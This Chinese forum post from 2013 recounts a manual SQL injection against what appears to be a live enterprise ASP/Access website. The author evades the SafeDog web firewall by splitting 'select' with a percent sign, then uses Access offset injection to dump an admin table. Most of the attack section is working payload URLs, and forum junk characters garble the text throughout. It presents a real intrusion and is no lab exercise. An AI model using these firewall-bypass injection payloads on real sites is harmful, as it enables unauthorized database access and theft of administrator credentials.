找回密码
 立即注册
查看: 2595|回复: 0
打印 上一主题 下一主题

一次手工渗透突破安全狗防御+ACCESS偏移注入

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-8 21:49:45 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
打开网站,一个企业站。5 q  w  x3 q2 ~% T

6 D( ~. N; c" F: H6 W6 B( G7 z: A( l0 }. Y8 f, `! h  V8 k* _8 H3 _1 G
顺手加个admin& p% r/ g* O: W% ?* K5 }5 H
7 U9 k/ J) U8 S: H, e+ s
( J3 v# ?  O+ @  h: K- E) T
默认后台。
% B$ d3 `* X- U$ U8 j/ z1 g- w8 ?回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。​
1 v  P; m) ~) Y2 i* o- o1 k2 N. _9 e. z: D6 W& _8 `' Z5 d: k
$ O( u) a& t$ @! _- {& _% ?

6 D- v9 V4 o: ]% U7 @所以就不用御剑扫了,待会直接封IP。) i- E$ Q4 t# f. [+ s
! ]1 {. x$ c) H1 V8 p$ C/ ~; U
用order by语句判断是否存在注入。
3 X4 m+ U; a" Khttp://www.xxx.com /product_show.asp?id=997 order by 1
' c* C# @8 A# \4 e. ^http://www.xxx.com /product_show.asp?id=997 order by 100
- g$ r, A& C, r$ z, T' h现在存在注入,经测试后发现是9个字段。) p, v1 _& ~. _8 G

# v" P; `; ^! u* P7 P, e接下来进行联合查询,猜是否存在admin表。
% M7 w, Q0 N) w8 ^  X% J' Lhttp://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。​# B4 g7 n! m, |, m2 |* k, ?
) S- E" Y/ S( k

7 ^# \7 c+ y* A5 h1 t0 ^% j- R
  V. r' Z; k6 @1 {在select中间加个%,se%lect绕过安全狗。
8 f0 H# e& N0 Q  @
9 \& l, ?6 u3 K; n2 ?7 p; q. ?, }- P# t/ k5 }: @2 p" h: Z
发现存在admin表,然后开始手工猜常用的字段。
& ?7 s7 f0 f' s( R3 Q- q: w纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。. G% Y4 ?* y3 h5 |/ V' H
; k1 t: }3 X, b& F3 N  {( E4 _# D* B
突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。
; [% T) h% ^; }& _, Z, J; F" M
6 t% h! T( L. D$ b9 u科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。
. H$ q4 w9 X* @6 a2 _# Y/ s+ x2 Chttp://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin' l5 b0 b+ ?7 [
好了,敏感内容出显了。​
- b  L" B4 w" M# o# Y4 ^9 P  K) }$ J. M) b3 V* X' C6 z

5 y$ d7 H) P/ Y0 X
* [/ q; e" B. S, H& t# P
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表